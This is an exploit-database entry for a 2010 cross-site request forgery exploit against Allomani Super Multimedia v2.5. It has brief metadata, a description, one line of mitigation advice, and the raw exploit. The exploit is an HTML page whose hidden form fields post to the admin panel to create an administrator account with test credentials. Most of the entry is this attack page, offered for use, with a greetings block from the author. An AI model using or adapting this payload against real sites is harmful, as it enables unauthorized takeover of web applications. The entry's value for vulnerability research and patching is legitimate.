Allomani - Super Multimedia v2.5 - [CSRF] Add Admin Account

vendor:

Super Multimedia

by:

G0D-F4Th3r

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Super Multimedia

Affected Version From: 2.5

Affected Version To: 2.5

Patch Exists: N/A

Related CWE: N/A

CPE: a:allomani:super_multimedia:2.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Allomani – Super Multimedia v2.5 – [CSRF] Add Admin Account

This exploit allows an attacker to add an admin account to the Allomani Super Multimedia v2.5 application by using a Cross-Site Request Forgery (CSRF) attack. The attacker can craft a malicious HTML page containing a form with hidden fields that will be automatically submitted when the page is loaded. The form contains the parameters necessary to add an admin account to the application.

Mitigation:

The application should validate the request origin and verify that the user is authorized to perform the requested action.

Source

Exploit-DB raw data:

# Exploit Title: Allomani - Super Multimedia v2.5 - [CSRF] Add Admin Account
# Date: 29-06-2010
# Author: G0D-F4Th3r
# Software Link: http://allomani.com
# Version: 2.5

####################################################
<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0" action="
http://www.site.com/[path]/admin/index.php">
<input type="hidden" name="action" value="adduserok"/>
<input type="hidden" name="username" value="test"/>
<input type="hidden" name="password" value="test"/>
<input type="hidden" name="email" value="test@test.com"/>
<input type="hidden" name="group_id" value="1"/>
<input type="hidden" name="useraddbutton" value="اضافة"/>
</form>
</body>
</html>

##################################################################################
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My
Friends
##################################################################################